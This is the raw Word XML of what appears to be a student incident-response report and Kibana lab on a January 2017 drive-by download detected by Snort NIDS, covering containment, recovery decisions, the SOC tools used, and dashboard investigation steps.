        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="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All affected systems were re-imaged to ensure complete removal of malware and any potential backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D70D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="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Network traffic logs and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>pcap files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> were reviewed to confirm no further compromise occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1DD3E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Data Recovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7256ED74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="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 data exfiltration was detected; therefore, data recovery efforts were minimal. Verified backups of critical systems were reviewed and tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE05F53">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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5. Decisions Made Throughout the Response Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B5A116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Decision to Isolate Affected Systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: This was made to immediately halt the spread of the infection, which proved effective in limiting the impac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F189BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>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Choice of Tools for Investigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">: The SOC team decided on using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Sguil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> based on their capabilities to analyze network traffic and security alerts effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E2D06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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Communication Strategy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: A proactive communication strategy was adopted to keep stakeholders informed, emphasizing transparency in handling the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9176F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> Tools and Resources Utilized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDDDD6">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Snort NIDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BEF3A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: Network Intrusion Detection System that detected suspicious activity and alerted the Security Operations Center (SOC) team regarding the drive-by download attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98928A">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Security Onion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F669861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440" w:hanging="360"/>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Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: A Linux distribution for intrusion detection, log management, and network security monitoring that helped in the identification and analysis of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73E301">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C36FC36">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFEFAA3">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Sguil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E22E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440" w:hanging="360"/>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Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: A GUI-based tool for monitoring and analyzing security alerts, which the SOC analysts used to investigate the alerts triggered by the Snort NIDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473426F7">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270FBB6B">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2195CA25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440" w:hanging="360"/>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Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: A network protocol analyzer used to capture and analyze network traffic, helping to trace the scope of the infection and identify malicious communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78B1DB">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BCBD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: A data visualization tool for Elasticsearch that helped the SOC team analyze logs and visualize suspicious activities and patterns during the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEFDBB0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>given</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> the following details about the event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECBB808">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="72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The event happened in January of 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FD8D6">
      <w:pPr>
        <w:pStyle w:val="35"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>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It was discovered by the Snort NIDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36936C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC2521A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="66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Use Kibana to Learn About a Malware Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD48E4E">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="60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59264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>275590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5448300" cy="1939290"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot of dashboard for the time period Jan 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of dashboard for the time period Jan 2017. "/>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8300" cy="1939290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>set an Absolute time range to narrow the focus to log data from January2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34641E87">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>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go to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>NIDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> Alert Data dashboard by clicking NIDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF3F2DC">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="36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5380990" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="screenshot of dashboard filtered for NIDS ale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of dashboard filtered for NIDS alert data."/>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2419" cy="2562686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB8EF9C">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="60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Zoom in on the event by clicking and dragging in the NIDS – Alerts Over Time visualization further focus in on the event timefram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD2017">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="24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5486400" cy="2188845"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="12" name="Picture 12" descr="screenshot of dashboard filtered for NIDS alert data zoom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of dashboard filtered for NIDS alert data zoomed in"/>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189284"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71550C30">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="60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Scroll all the way to the bottom of the dashboard until you see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>NIDS Alerts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> section of the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C174C3">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="24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0288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>130175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5473700" cy="1864995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21401"/>
                <wp:lineTo x="21500" y="21401"/>
                <wp:lineTo x="21500" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="15" name="Picture 15" descr="A screenshot of results of NIDS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results of NIDS alerts"/>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73700" cy="1864995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A94943">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="24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675630" cy="3246120"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="kb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bine3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5676161" cy="3246120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211D45B">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
